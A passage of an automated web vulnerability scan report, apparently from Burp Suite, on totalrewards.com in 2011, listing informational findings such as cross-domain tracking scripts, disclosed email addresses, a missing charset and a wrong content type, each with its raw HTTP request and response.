Date: Sat, 19 Mar 2011 13:52:19 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17769


<!DOCTYPE HTML>
<html class="no-js">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">


<link type="text/css" rel="style
...[SNIP]...
<!-- netmining tag - added 3/18/2010 - tws -->
<script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script>
...[SNIP]...

6.13. http://www.totalrewards.com/destinations/atlantic-city/hotel-casinos/market-home.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /destinations/atlantic-city/hotel-casinos/market-home.shtml

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /destinations/atlantic-city/hotel-casinos/market-home.shtml HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:07 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 69495

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!-- netmining tag - added 3/18/2010 - tws -->
<script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script>
...[SNIP]...

6.14. http://www.totalrewards.com/destinations/new-orleans-biloxi/hotel-casinos/market-home.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /destinations/new-orleans-biloxi/hotel-casinos/market-home.shtml

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /destinations/new-orleans-biloxi/hotel-casinos/market-home.shtml HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:09 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45697


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<link type="text/c
...[SNIP]...
<!-- netmining tag - added 3/18/2010 - tws -->
<script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script>
...[SNIP]...

6.15. http://www.totalrewards.com/destinations/reno--tahoe/hotel-casinos/market-home.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /destinations/reno--tahoe/hotel-casinos/market-home.shtml

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /destinations/reno--tahoe/hotel-casinos/market-home.shtml HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:08 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52711


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<link type="text/c
...[SNIP]...
<!-- netmining tag - added 3/18/2010 - tws -->
<script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script>
...[SNIP]...

6.16. http://www.totalrewards.com/destinations/tunica/hotel-casinos/market-home.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /destinations/tunica/hotel-casinos/market-home.shtml

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /destinations/tunica/hotel-casinos/market-home.shtml HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:09 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 55053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link type="text/css" re
...[SNIP]...
<!-- netmining tag - added 3/18/2010 - tws -->
<script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script>
...[SNIP]...

6.17. http://www.totalrewards.com/hot-deals/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /hot-deals/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /hot-deals/ HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:05 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 29728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!-- netmining tag - added 3/18/2010 - tws -->
<script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script>
...[SNIP]...
</script>

<script language="JavaScript" src="https://ads.revsci.net/adserver/rsi_event.js"></script>
...[SNIP]...

6.18. http://www.totalrewards.com/index.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /index.shtml

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /index.shtml? HTTP/1.1
Host: www.totalrewards.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; mercury=Y

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 13:44:28 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40791

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!-- SITE WIDE TAG MOVED FROM GLOBAL LOGIN -->
<script language="JavaScript" src="https://view.atdmt.com/jaction/heihb9_HarrahsSiteWideRemessagingTag_10"></script>
...[SNIP]...
<!-- netmining tag - added 3/18/2010 - tws -->
<script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script>
...[SNIP]...

6.19. http://www.totalrewards.com/legal.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /legal.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /legal.html HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:30 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14004

<!DOCTYPE HTML>
<html class="no-js">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link type="text/css" rel="stylesheet" href="/css_includes/caesars-corporate.css"/>
...[SNIP]...
<!-- netmining tag - added 3/18/2010 - tws -->
<script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script>
...[SNIP]...

6.20. http://www.totalrewards.com/mobile/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /mobile/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /mobile/ HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:17 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!-- netmining tag - added 3/18/2010 - tws -->
<script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script>
...[SNIP]...

6.21. http://www.totalrewards.com/our-casinos/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /our-casinos/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /our-casinos/ HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:03 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!-- netmining tag - added 3/18/2010 - tws -->
<script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script>
...[SNIP]...

6.22. http://www.totalrewards.com/privacy.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /privacy.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /privacy.html HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:30 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73957

<!DOCTYPE HTML>
<html class="no-js">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link type="text/css" rel="stylesheet" href="/css_includes/caesars-corporate.css"/>
...[SNIP]...
<!-- netmining tag - added 3/18/2010 - tws -->
<script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script>
...[SNIP]...

6.23. http://www.totalrewards.com/security.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /security.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /security.html HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:30 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14547

<!DOCTYPE HTML>
<html class="no-js">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link type="text/css" rel="stylesheet" href="/css_includes/caesars-corporate.css"/>
...[SNIP]...
<!-- netmining tag - added 3/18/2010 - tws -->
<script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script>
...[SNIP]...

6.24. http://www.totalrewards.com/site-map.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /site-map.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /site-map.html HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:29 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 56178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!-- netmining tag - added 3/18/2010 - tws -->
<script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script>
...[SNIP]...

6.25. http://www.totalrewards.com/total_rewards/benefits/benefits.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /total_rewards/benefits/benefits.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /total_rewards/benefits/benefits.jsp HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:33 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Server: WebSphere Application Server/5.1
Set-Cookie: JSESSIONID=0000dhZvOdDQBG0U7xAmK5lGA_3:14tlevj56;Path=/
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: no-store, no-cache, max-age=0, s-maxage=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
Page where patron can get information about various benefits
Creat
...[SNIP]...
<!-- netmining tag - added 3/18/2010 - tws --><script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script>
...[SNIP]...

6.26. http://www.totalrewards.com/total_rewards/overview/overview.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /total_rewards/overview/overview.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /total_rewards/overview/overview.jsp HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:33 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Server: WebSphere Application Server/5.1
Set-Cookie: JSESSIONID=00001C2WZelB9cbBQmxLD0-aNgv:12qh2p7li;Path=/
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
   This page displays the overview of Total Rewards (trOverview.jsp)
   Cr
...[SNIP]...
<!-- netmining tag - added 3/18/2010 - tws --><script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script>
...[SNIP]...

6.27. http://www.totalrewards.com/total_rewards/rewards/rewards.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /total_rewards/rewards/rewards.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /total_rewards/rewards/rewards.jsp HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:34 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Server: WebSphere Application Server/5.1
Set-Cookie: JSESSIONID=0000qYtZ2n4v5YwPVAM7OOwpe2r:12qh2p7li;Path=/
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: no-store, no-cache, max-age=0, s-maxage=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
Page where patron can get information about various rewards
Creati
...[SNIP]...
<!-- netmining tag - added 3/18/2010 - tws --><script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script>
...[SNIP]...

6.28. http://www.totalrewards.com/trademarks.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /trademarks.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /trademarks.html HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:29 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13219

<!DOCTYPE HTML>
<html class="no-js">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link type="text/css" rel="stylesheet" href="/css_includes/caesars-corporate.css"/>
...[SNIP]...
<!-- netmining tag - added 3/18/2010 - tws -->
<script src="https://mdfst.netmng.com/?aid=173" type="text/javascript" defer="defer"></script>
...[SNIP]...

7. Email addresses disclosed  previous  next
There are 2 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


7.1. http://www.totalrewards.com/javascript_includes/CalendarPopup.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /javascript_includes/CalendarPopup.js

Issue detail

The following email address was disclosed in the response:

Request

GET /javascript_includes/CalendarPopup.js HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Content-Length: 60449
Content-Type: application/x-javascript
Last-Modified: Thu, 20 Mar 2008 15:15:44 GMT
Accept-Ranges: bytes
ETag: "01046449d8ac81:1d8f"
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Date: Sat, 19 Mar 2011 13:51:51 GMT
Connection: close

// Temporary, to stop linking directly to the js file
// Remove these lines before using this code (this will be removed soon)
if (window.location.href.indexOf("spiralsolutions")>-1) { alert("Please
...[SNIP]...
<matt@mattkruse.com>
...[SNIP]...

7.2. http://www.totalrewards.com/privacy.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /privacy.html

Issue detail

The following email address was disclosed in the response:

Request

GET /privacy.html HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 19 Mar 2011 13:52:30 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73957

<!DOCTYPE HTML>
<html class="no-js">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link type="text/css" rel="stylesheet" href="/css_includes/caesars-corporate.css"/>
...[SNIP]...
<a href="mailto:privacyofficer@caesarswindsor.com" target="_blank">privacyofficer@caesarswindsor.com</a>
...[SNIP]...
<a href="mailto:privacyofficer@caesarswindsor.com" target="_blank">privacyofficer@caesarswindsor.com</a>
...[SNIP]...

8. HTML does not specify charset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /xml/packages/undefined.xml

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

Request

GET /xml/packages/undefined.xml HTTP/1.1
Host: www.totalrewards.com
Proxy-Connection: keep-alive
Referer: http://www.totalrewards.com/index.shtml?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; mercury=Y

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Sat, 19 Mar 2011 13:44:30 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html

<root>404</root>

9. Content type incorrectly stated  previous
There are 3 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


9.1. http://www.totalrewards.com/PackageSearch.do  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.totalrewards.com
Path:   /PackageSearch.do

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /PackageSearch.do HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 19 Mar 2011 13:52:16 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Server: WebSphere Application Server/5.1
Set-Cookie: JSESSIONID=0000sD6ZBwCkHW6DNwZpUY0_tqo:12qh2p7li;Path=/
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en

Error 500: Define tag cannot set a null value

